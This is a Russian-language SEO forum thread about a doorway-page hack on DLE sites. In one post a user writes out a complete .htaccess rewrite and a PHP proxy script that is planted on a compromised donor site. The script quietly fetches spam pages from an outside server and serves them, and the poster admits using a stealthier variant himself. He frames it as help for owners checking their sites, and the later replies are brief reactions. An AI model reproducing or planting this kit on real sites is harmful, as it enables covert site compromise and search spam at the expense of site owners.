DLE - интересный взлом

12
[Удален]
#11

Кстати, уже пару лет как многие дорвейщики используют так называемые революционный метод заливки (это пошло с бсс :) ).

Метод специально предназначен для "прятания" дора от глаз владельца.

Работает такой дор по следующей схеме:

Есть выделенный сервак, на который залиты доры.

На сайте-доноре заливается всего два-три файла.

.htaccess с таким содержанием:

RewriteEngine On
RewriteBase /papkasdorom

RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !-f

RewriteRule index.php.* - [L]

RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !-f

RewriteRule ^(.*) index.php?id=$1

и index.php


<?php

$id = isset($_GET['id']) ? $_GET['id'] : '';
$query = isset($_POST['query']) ? $_POST['query'] : '';

$ch = curl_init();
$url = "http://doorwaystotage.ru/$id";
$data = array
(
'domain' => 'site.ru/papkasdorom',
'query' => $query
);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$html = curl_exec($ch);
$code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$type = curl_getinfo($ch, CURLINFO_CONTENT_TYPE);
curl_close($ch);

if($code == '404')
{
header("HTTP/1.0 404 Not Found");
}

header("Content-Type: $type");
echo $html;


Третим файлом может быть robots.txt в этой же папке. По нему кстати очень удобно искать. Если вы знаете, что у вас используется один роботс в корне, то просто выполните поиск.

---------- Добавлено 15.04.2013 в 11:58 ----------

Здесь я показал довольно примитивный .htaccess

Можно изощряться очень много, и вы даже не найдёте его

Я последний год использовал свой метод, .htaccess заливается в стопицотую папку, реврайт рулес указывал свой и в итоге получал следующее:

эти три чудо-файла находятся где-то в жопе сайта, где-то в скриптах, куда вы ну очень редко ходим) а перенаправляет на site.ru/dor. Ну и конечно же для рефов с пс, подстановка куков, кеширование... :)

Думаю эта информация поможет вам в проверке своих сайтов на наличие доров.

6666
На сайте с 10.01.2005
Offline
505
#12
MaxBelov25:
революционный метод заливки

Жесть, реально.........

Каждое мое сообщение проверила и одобрила Елена Летучая. (c) Для меня очень важно все что Вы говорите! (http://surrealism.ru/123.mp3) .
C
На сайте с 04.02.2005
Offline
291
#13

6666, та ладно, человек даже смайлик поставил, но внятно сказал куда и что смотреть (для начала)

6666
На сайте с 10.01.2005
Offline
505
#14

Chukcha, ну я не поставил, но смысл тот же.

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий